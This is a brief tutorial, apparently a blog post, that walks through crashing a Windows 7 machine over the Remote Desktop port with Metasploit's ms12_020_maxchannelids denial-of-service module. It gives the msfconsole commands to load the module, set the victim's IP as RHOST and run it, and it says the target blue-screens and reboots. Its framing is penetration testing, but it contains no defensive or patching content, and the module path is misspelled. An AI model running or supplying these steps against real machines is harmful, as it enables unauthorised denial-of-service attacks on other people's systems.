Penetration Testing Windows 7 by Crashing the Machine Using Remote Desktop Connection Vulnerability.
This is a tutorial for penetration testing the Windows 7 machine for the remote desktop connection vulnerability using everyone’s favorite exploitation, Framework. Earlier there were exploits for the unpatched XP Machines, but those don’t exist in modern Operating Systems such as Windows 7.
Generally, we have seen client side exploits and payloads all the time for Windows 7. Social Engineering Toolkit is great for these attacks; however, Windows 7 still has a vulnerability living in it, in the RDP (Remote Desktop Protocol) Port 3389 which is accessible over the LAN and the internet. Over the internet, this gets a little complicated due to the need for port forwarding, but over the LAN this attack is as easy as pie.
All you need to perform this penetration testing tutorial is a Kali machine and a Victim Windows 7 Machine.
Penetration testing Windows 7 with Kali Linux
Let’s begin the tutorial with a scenario where the victim’s Windows 7 machine is over LAN. All we need to get started is the IP address of the Windows 7 machines, which you can easily get either by NMAP or IPCONFIG command.
Start MeTaSploit : msfconsole
Next we need to select the exploit that we are planing to use i.e ms12_020_maxchannelids
Command: use auxillary/dos/windows/rdp/ms12_020_maxchannelids
Now if you don’t know what options this exploit needs, then type the command ” show options ” in msfconsole. This will present you with all the options this exploit needs to be set.
Set the Remote Host IP Address:
Command : set RHOST <Vict-windows 7 IP>
And you are finished!
Just type “exploit”
The target machine will get a blue screen and the machine will crash. The Machine will reboot.